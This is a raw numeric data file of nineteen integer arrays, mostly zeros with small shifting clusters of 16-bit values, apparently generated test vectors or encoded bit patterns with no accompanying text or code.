[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 28036, 5185, 27622, 59654, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 7168, 42752, 33216, 624, 52252, 28327, 19980],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 54404, 11073, 55526, 26118, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 22016, 58752, 35967],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 15236, 16961, 17894, 58118, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 46080, 36096, 43840, 57552, 26292, 28045, 20142],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 41604, 22849, 45798, 24582, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 30720, 56832, 10112, 60896, 55928, 37854, 50761],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 2436, 28737, 8166, 56582, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 49920, 59584, 25648, 21132, 20163, 53952],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 28804, 34625, 36070, 23046, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 52224, 37632, 19648, 55600, 1740, 33859],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 55172, 40513, 63974, 55046, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 41984, 51456, 39488, 42128, 21924, 37833, 39618],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 16004, 46401, 26342, 21510, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 10240, 51712, 33408, 27808, 4136, 15818, 45293],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 42372, 52289, 54246, 53510, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 64512, 7936, 8128, 63984, 34300, 4639, 33588],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 3204, 58177, 16614, 19974, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 54784, 34176, 52576, 7256, 33479],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 29572, 64065, 44518, 51974, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 17664, 55616, 64592, 51604, 21317, 42134],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 55940, 4417, 6886, 18438, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 55296, 62976, 28032, 3936, 28376, 18934, 7249],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 16772, 10305, 34790, 50438, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 27648, 47872, 9920, 33712, 22124, 62651, 29544],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 43140, 16193, 62694, 16902, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 9216, 10496, 49728, 58000, 4644, 11275],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 3972, 22081, 25062, 48902, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 256, 26688, 43024, 12932, 2049, 57386],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 30340, 27969, 52966, 15366, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 34816, 25088, 59520, 38432, 9864, 17506, 35957],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 56708, 33857, 15334, 47366, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 38656, 64960, 49520, 46044, 29335, 30556],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 17540, 39745, 43238, 13830, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 49920, 51392, 5168, 58383],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 43908, 45633, 5606, 45830, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 29696, 64768, 18240, 26576, 116, 19965, 33150],
